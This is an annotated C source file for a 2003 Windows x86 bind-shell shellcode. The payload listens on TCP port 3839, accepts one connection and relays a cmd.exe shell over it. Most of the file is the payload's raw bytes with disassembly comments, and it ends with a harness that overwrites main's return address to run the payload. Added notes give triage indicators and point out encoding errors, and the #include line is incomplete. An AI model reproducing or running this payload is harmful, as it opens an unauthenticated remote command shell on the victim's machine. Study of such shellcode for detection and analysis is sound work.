// The Dark Raver
// 27/03/2003
// 517 bytes
// PIPES + BINDSHELL + CMD
// - Port: 3839
// - Hardcoded API offsets
// - Without Nulls
//
// What the bytes below do, in order: WSAStartup(0x101) -> socket(2,1,6)
// -> bind to sin_addr=0 (any interface), port 3839 -> listen(5) -> one
// accept().  Two anonymous pipes are then created and installed as the
// process's stdout/stdin handles, cmd.exe is started with
// bInheritHandles=1, and an endless loop copies whatever the child writes
// to the socket and whatever arrives on the socket to the child's stdin.
// Nothing is ever closed and neither branch of the loop has an exit.
//
// Triage notes: the host-side indicators are a process that unexpectedly
// listens on TCP 3839 and then spawns cmd.exe whose standard handles are
// pipes.  Every API is reached through an absolute address
// (mov $imm32,%eax; call *%eax), so the payload only runs against the one
// wsock32.dll / kernel32.dll build those addresses were taken from; the
// page does not say which Windows version that is.
//
// Stack slots actually addressed by the bytes (several of the original
// inline comments disagree with the encoding; in particular the disp8
// values 0x50..0x6c are POSITIVE, i.e. above %ebp and outside the
// 0x68-byte frame reserved by `sub $0x68,%esp`):
//   -0x10b0 serv_addr (16 bytes)
//   -0x10a0 siStartInfo (zeroed with 0x68 = 104 bytes, ends just below hDes)
//   -0x1050 piProcInfo  (zeroed with 0x16 = 22 bytes)
//   -0x1040 info for WSAStartup (presumably larger than the 8 bytes before
//           hDes; harmless only because hDes/chBuf are written afterwards)
//   -0x1038 hDes  (listening socket)
//   -0x1030 chBuf (127 bytes)
//   -0x34   hSock (accepted socket)
//   -0x30   saAttr: nLength=12 @-0x30, lpSecurityDescriptor=0 @-0x2c,
//           bInheritHandle=1 @-0x28
//   -0x1c   x = 16 (addrlen for accept)
//   +0x50 hChildStdoutWr   +0x54 hChildStdoutRdDup   +0x58 hChildStdoutRd
//   +0x5c hChildStdinRd    +0x60 dwRead (also used as dwWritten)
//   +0x68 hChildStdinWr    +0x6c hChildStdinWrDup
//
// NOTE(review): the header name of the #include below was lost when this
// page was captured; as shown the directive is incomplete.
#include
char hell[]=
"\x55" /* push %ebp */
"\x89\xe5" /* mov %esp,%ebp */
"\x83\xec\x68" /* sub $0x68,%esp */
"\x31\xdb" /* xor %ebx,%ebx */ // %ebx stays 0 for the whole payload
// ---- Table of API addresses ----
// The "(%ebp)" column is a leftover plan: no table is ever built, each
// call site loads the absolute address into %eax and does call *%eax.
// call WSAStartup = 0x71A341DA = 0x08(%ebp)
// call socket = 0x71A33C22 = 0x0C(%ebp)
// call bind = 0x71A33ECE = 0x10(%ebp)
// call listen = 0x71A35DE2 = 0x14(%ebp)
// call accept = 0x71A3868D = 0x18(%ebp)
// call CreatePipe = 0x77E5727A = 0x1C(%ebp)
// call SetStdHandle = 0x77E5FF2E = 0x20(%ebp)
// call DuplicateHandle = 0x77E59CE3 = 0x28(%ebp)
// call CloseHandle = 0x77E57963 = 0x2C(%ebp)   (listed but never called)
// call CreateProcessA = 0x77E41BB8 = 0x34(%ebp)
// call PeekNamedPipe = 0x77E97624 = 0x3C(%ebp)
// call ReadFile = 0x77E58B82 = 0x40(%ebp)
// call send = 0x71A31Af4 = 0x44(%ebp)
// call recv = 0x71A51020 = 0x48(%ebp)
// call WriteFile = 0x77e59d8c = 0x4C(%ebp)
// ---- socket + bind + listen + accept ----
// x = 16;
// &x = 0xffffffe4(%ebp)
"\x89\x5d\xe4" /* mov %ebx,0xffffffe4(%ebp) */
"\xc6\x45\xe4\x10" /* movb $0x10,0xffffffe4(%ebp) */
// WSAStartup(257, &info);
// &info = 0xffffefc0(%ebp)   (the bytes encode disp32 0xffffefc0)
"\x8d\x85\xc0\xef\xff\xff" /* lea 0xffffefc0(%ebp),%eax */
"\x50" /* push %eax */
"\x31\xd2" /* xor %edx,%edx */
"\x66\xba\x01\x01" /* mov $0x101,%dx */
"\x52" /* push %edx */
// call WSAStartup = 0x71A341DA
"\xb8\xDA\x41\xA3\x71" /* movl $0x71A341DA,%eax */
"\xff\xd0" /* call *%eax */
// hDes=socket(2, 1, 6);
"\x6a\x06" /* push $0x6 */
"\x6a\x01" /* push $0x1 */
"\x6a\x02" /* push $0x2 */
// call socket = 0x71A33C22 = 0x0C
"\xb8\x22\x3C\xA3\x71" /* movl $0x71A33C22,%eax */
"\xff\xd0" /* call *%eax */
// &hDes=0xffffefc8(%ebp)   (return value is never checked)
"\x89\x85\xc8\xef\xff\xff" /* mov %eax,0xffffefc8(%ebp) */
// serv_addr.sin_family = 2;
// &serv_addr = 0xffffef50(%ebp)
"\x31\xd2" /* xor %edx,%edx */
"\xb2\x02" /* mov $0x2,%dl */
"\x66\x89\x95\x50\xef\xff\xff" /* mov %dx,0xffffef50(%ebp) */
// serv_addr.sin_port = 65294;   (0xff0e in memory = port 3839 in network order)
"\x66\xc7\x85\x52\xef\xff\xff\x0e\xff" /* movw $0xff0e,0xffffef52(%ebp) */
// serv_addr.sin_addr.s_addr = 0;   (sin_zero is left uninitialised)
"\x89\x9d\x54\xef\xff\xff" /* mov %ebx,0xffffef54(%ebp) */
// hSock = bind(hDes, (struct sockaddr *)&serv_addr, 16);
"\x6a\x10" /* push $0x10 */
"\x8d\x85\x50\xef\xff\xff" /* lea 0xffffef50(%ebp),%eax */
"\x50" /* push %eax */
"\x8b\x85\xc8\xef\xff\xff" /* mov 0xffffefc8(%ebp),%eax */
"\x50" /* push %eax */
// call bind = 0x71A33ECE
"\xb8\xCE\x3E\xA3\x71" /* movl $0x71A33ECE,%eax */
"\xff\xd0" /* call *%eax */
// hSock = listen(hDes, 5);
"\x6a\x05" /* push $0x5 */
"\x8b\x85\xc8\xef\xff\xff" /* mov 0xffffefc8(%ebp),%eax */
"\x50" /* push %eax */
// call listen = 0x71A35DE2
"\xb8\xE2\x5D\xA3\x71" /* movl $0x71A35DE2,%eax */
"\xff\xd0" /* call *%eax */
// hSock = accept(hDes, (struct sockaddr *)&serv_addr, &x);
"\x8d\x45\xe4" /* lea 0xffffffe4(%ebp),%eax */
"\x50" /* push %eax */
"\x8d\x85\x50\xef\xff\xff" /* lea 0xffffef50(%ebp),%eax */
"\x50" /* push %eax */
"\x8b\x85\xc8\xef\xff\xff" /* mov 0xffffefc8(%ebp),%eax */
"\x50" /* push %eax */
// call accept = 0x71A3868D
"\xb8\x8D\x86\xA3\x71" /* movl $0x71A3868D,%eax */
"\xff\xd0" /* call *%eax */
// &hSock=0xffffffcc(%ebp)   (disp32 form of -0x34; not checked for failure)
"\x89\x85\xcc\xff\xff\xff" /* mov %eax,0xffffffcc(%ebp) */
// ---- Creating and wiring up the handles ----
// saAttr.nLength = 12;
// saAttr.lpSecurityDescriptor = 0;
// saAttr.bInheritHandle = 1;
"\x31\xd2" /* xor %edx,%edx */
"\x83\xc2\x01" /* add $0x1,%edx */
"\x89\x55\xd8" /* mov %edx,0xffffffd8(%ebp) */
"\x83\xc2\x0b" /* add $0xb,%edx */
"\x89\x55\xd0" /* mov %edx,0xffffffd0(%ebp) */
"\x89\x5d\xd4" /* mov %ebx,0xffffffd4(%ebp) */
// CreatePipe(&hChildStdoutRd, &hChildStdoutWr, &saAttr, 0);
// The output slots are +0x58 / +0x50 above %ebp, not 0xffffff58 / 0xffffff50.
"\x53" /* push %ebx */
"\x8d\x45\xd0" /* lea 0xffffffd0(%ebp),%eax */
"\x50" /* push %eax */
"\x8d\x45\x50" /* lea 0x50(%ebp),%eax */
"\x50" /* push %eax */
"\x8d\x45\x58" /* lea 0x58(%ebp),%eax */
"\x50" /* push %eax */
// call CreatePipe = 0x77E5727A
"\xb8\x7A\x72\xE5\x77" /* movl $0x77E5727A,%eax */
"\xff\xd0" /* call *%eax */
// SetStdHandle(-11, hChildStdoutWr);
"\x8b\x45\x50" /* mov 0x50(%ebp),%eax */
"\x50" /* push %eax */
"\x6a\xf5" /* push $0xfffffff5 */
// call SetStdHandle = 0x77E5FF2E = 0x20
"\xb8\x2E\xFF\xE5\x77" /* movl $0x77E5FF2E,%eax */
"\xff\xd0" /* call *%eax */
// DuplicateHandle(-1, hChildStdoutRd, -1, &hChildStdoutRdDup , 0, 0, 2);
"\x6a\x02" /* push $0x2 */
"\x53" /* push %ebx */
"\x53" /* push %ebx */
"\x8d\x45\x54" /* lea 0x54(%ebp),%eax */
"\x50" /* push %eax */
"\x68\xff\xff\xff\xff" /* push $0xffffffff */
"\x8b\x45\x58" /* mov 0x58(%ebp),%eax */
"\x50" /* push %eax */
"\x68\xff\xff\xff\xff" /* push $0xffffffff */
// call DuplicateHandle = 0x77E59CE3 = 0x28
"\xb8\xE3\x9C\xE5\x77" /* movl $0x77E59CE3,%eax */
"\xff\xd0" /* call *%eax */
// CreatePipe(&hChildStdinRd, &hChildStdinWr, &saAttr, 0);
"\x53" /* push %ebx */
"\x8d\x45\xd0" /* lea 0xffffffd0(%ebp),%eax */
"\x50" /* push %eax */
"\x8d\x45\x68" /* lea 0x68(%ebp),%eax */
"\x50" /* push %eax */
"\x8d\x45\x5c" /* lea 0x5c(%ebp),%eax */
"\x50" /* push %eax */
// call CreatePipe = 0x77E5727A = 0x1C
"\xb8\x7A\x72\xE5\x77" /* movl $0x77E5727A,%eax */
"\xff\xd0" /* call *%eax */
// SetStdHandle(-10, hChildStdinRd);
"\x8b\x45\x5c" /* mov 0x5c(%ebp),%eax */
"\x50" /* push %eax */
"\x6a\xf6" /* push $0xfffffff6 */
// call SetStdHandle = 0x77E5FF2E = 0x20
"\xb8\x2E\xFF\xE5\x77" /* movl $0x77E5FF2E,%eax */
"\xff\xd0" /* call *%eax */
// DuplicateHandle(-1, hChildStdinWr, -1, &hChildStdinWrDup, 0, 0, 2);
"\x6a\x02" /* push $0x2 */
"\x53" /* push %ebx */
"\x53" /* push %ebx */
"\x8d\x45\x6c" /* lea 0x6c(%ebp),%eax */
"\x50" /* push %eax */
"\x68\xff\xff\xff\xff" /* push $0xffffffff */
"\x8b\x45\x68" /* mov 0x68(%ebp),%eax */
"\x50" /* push %eax */
"\x68\xff\xff\xff\xff" /* push $0xffffffff */
// call DuplicateHandle = 0x77E59CE3 = 0x28
"\xb8\xE3\x9C\xE5\x77" /* movl $0x77E59CE3,%eax */
"\xff\xd0" /* call *%eax */
// ---- Launching cmd.exe ----
// memset(&piProcInfo, 0, 16);   (the count is actually 0x16 = 22 bytes)
// &piProcInfo=0xffffefb0(%ebp)
"\x8d\xbd\xb0\xef\xff\xff" /* lea 0xffffefb0(%ebp),%edi */
"\x88\xd8" /* mov %bl,%al */ // %al = 0 without a null byte in the encoding
"\x31\xc9" /* xor %ecx,%ecx */
"\xb1\x16" /* mov $0x16,%cl */
"\xf3\xaa" /* rep stos %al,%es:(%edi) */
// memset(&siStartInfo, 0, 68);   (the count is actually 0x68 = 104 bytes,
// which also re-zeroes the piProcInfo range just above it)
// &siStartInfo= 0xffffef60(%ebp)
"\x8d\xbd\x60\xef\xff\xff" /* lea 0xffffef60(%ebp),%edi */
"\x88\xd8" /* mov %bl,%al */
"\x31\xc9" /* xor %ecx,%ecx */
"\xb1\x68" /* mov $0x68,%cl */
"\xf3\xaa" /* rep stos %al,%es:(%edi) */
// CreateProcess(0, "cmd.exe", 0, 0, 1, 0, 0, 0, &siStartInfo, &piProcInfo);
"\x8d\x85\xb0\xef\xff\xff" /* lea 0xffffefb0(%ebp),%eax */
"\x50" /* push %eax */
"\x8d\x85\x60\xef\xff\xff" /* lea 0xffffef60(%ebp),%eax */
"\x50" /* push %eax */
"\x53" /* push %ebx */
"\x53" /* push %ebx */
"\x53" /* push %ebx */
"\x6a\x01" /* push $0x1 */
"\x53" /* push %ebx */
"\x53" /* push %ebx */
// push &cmd.exe
// jmp/call/pop-style trick: the call pushes the address of the string that
// follows it, the second jmp then skips over the string.  The string has no
// terminating null inside the payload ("Without Nulls"), so the command line
// seen by CreateProcessA runs on through the following bytes until the first
// 0x00 after the payload.
"\xeb\x02" /* jmp +2 */
"\xeb\x0d" /* jmp +13 */
"\xe8\xf9\xff\xff\xff" /* call -7 */
"cmd.exe\x20" /* command string */
"\x53" /* push %ebx */
// call CreateProcessA = 0x77E41BB8
"\xb8\xB8\x1B\xE4\x77" /* movl $0x77E41BB8,%eax */
"\xff\xd0" /* call *%eax */
// ---- Relay loop between the socket and the pipe handles ----
// loop:
// Delay...   (busy loop of 0x10101010 iterations; no sleep API is used)
"\xb9\x10\x10\x10\x10" /* mov $0x10101010,%ecx */
"\xe2\xfe" /* loop -2 */
// PeekNamedPipe(hChildStdoutRdDup, chBuf, 127, &dwRead, 0, 0);
"\x53" /* push %ebx */
"\x53" /* push %ebx */
"\x8d\x45\x60" /* lea 0x60(%ebp),%eax */
"\x50" /* push %eax */
"\x6a\x7f" /* push $0x7f */
"\x8d\x85\xd0\xef\xff\xff" /* lea 0xffffefd0(%ebp),%eax */
"\x50" /* push %eax */
"\x8b\x45\x54" /* mov 0x54(%ebp),%eax */
"\x50" /* push %eax */
// call PeekNamedPipe = 0x77E97624
"\xb8\x24\x76\xE9\x77" /* movl $0x77E97624,%eax */
"\xff\xd0" /* call *%eax */
// if(dwRead<=0) goto notif;   (signed compare; the call's own result is ignored)
"\x39\x5d\x60" /* cmp %ebx,0x60(%ebp) */
"\x7e\x35" /* jle notif */
// ReadFile(hChildStdoutRdDup, chBuf, 127, &dwRead, 0);
"\x53" /* push %ebx */
"\x8d\x45\x60" /* lea 0x60(%ebp),%eax */
"\x50" /* push %eax */
"\x6a\x7f" /* push $0x7f */
"\x8d\x85\xd0\xef\xff\xff" /* lea 0xffffefd0(%ebp),%eax */
"\x50" /* push %eax */
"\x8b\x45\x54" /* mov 0x54(%ebp),%eax */
"\x50" /* push %eax */
// call ReadFile = 0x77E58B82
"\xb8\x82\x8B\xE5\x77" /* movl $0x77E58B82,%eax */
"\xff\xd0" /* call *%eax */
// send(hSock, chBuf, dwRead, 0);
"\x53" /* push %ebx */
"\x8b\x45\x60" /* mov 0x60(%ebp),%eax */
"\x50" /* push %eax */
"\x8d\x85\xd0\xef\xff\xff" /* lea 0xffffefd0(%ebp),%eax */
"\x50" /* push %eax */
"\x8b\x85\xcc\xff\xff\xff" /* mov 0xffffffcc(%ebp),%eax */
"\x50" /* push %eax */
// call send = 0x71A31Af4
"\xb8\xF4\x1A\xA3\x71" /* movl $0x71A31AF4,%eax */
"\xff\xd0" /* call *%eax */
"\xeb\xa5" /* jmp loop */
// notif:
// dwRead=recv(hSock, chBuf, 127, 0);   (buffer size pushed is 0x7f, not 256)
"\x53" /* push %ebx */
"\x6a\x7f" /* push $0x7f */
"\x8d\x85\xd0\xef\xff\xff" /* lea 0xffffefd0(%ebp),%eax */
"\x50" /* push %eax */
"\x8b\x85\xcc\xff\xff\xff" /* mov 0xffffffcc(%ebp),%eax */
"\x50" /* push %eax */
// call recv = 0x71A51020
"\xb8\x20\x10\xA5\x71" /* movl $0x71A51020,%eax */
"\xff\xd0" /* call *%eax */
// &dwRead=0x60(%ebp)   -- the recv result (error or zero included) is stored
// unchecked and handed straight to WriteFile as the byte count.
"\x89\x45\x60" /* mov %eax,0x60(%ebp) */
// WriteFile(hChildStdinWrDup, chBuf, dwRead, &dwWritten, 0);
// &dwWritten is the same slot as dwRead (+0x60).
"\x53" /* push %ebx */
"\x8d\x45\x60" /* lea 0x60(%ebp),%eax */
"\x50" /* push %eax */
"\x8b\x45\x60" /* mov 0x60(%ebp),%eax */
"\x50" /* push %eax */
"\x8d\x85\xd0\xef\xff\xff" /* lea 0xffffefd0(%ebp),%eax */
"\x50" /* push %eax */
"\x8b\x45\x6c" /* mov 0x6c(%ebp),%eax */
"\x50" /* push %eax */
// call WriteFile = 0x77e59d8c
"\xb8\x8C\x9D\xE5\x77" /* movl $0x77E59D8C,%eax */
"\xff\xd0" /* call *%eax */
// jmp loop
"\xe9\x6a\xff\xff\xff" /* jmp loop */
"";
// TDR
// Test harness, not part of the payload.  LoadLibraryA pulls wsock32.dll
// into this process so that the hardcoded 0x71A3xxxx addresses can resolve
// (only on the DLL build they were taken from); the length print passes a
// size_t to %d.  The last two statements store the address of `hell` into
// the stack slot two ints above `ret` -- presumably main's saved return
// address under the author's compiler -- so that returning from main jumps
// into the payload.  This depends entirely on that compiler's frame layout
// and on the stack being executable; under any other layout it does
// nothing useful or crashes.
int main() {
 int *ret;
 LoadLibraryA("wsock32.dll");
 printf("%d\n",strlen(hell));
 ret = (int *)&ret + 2;
 (*ret) = (int)hell;
}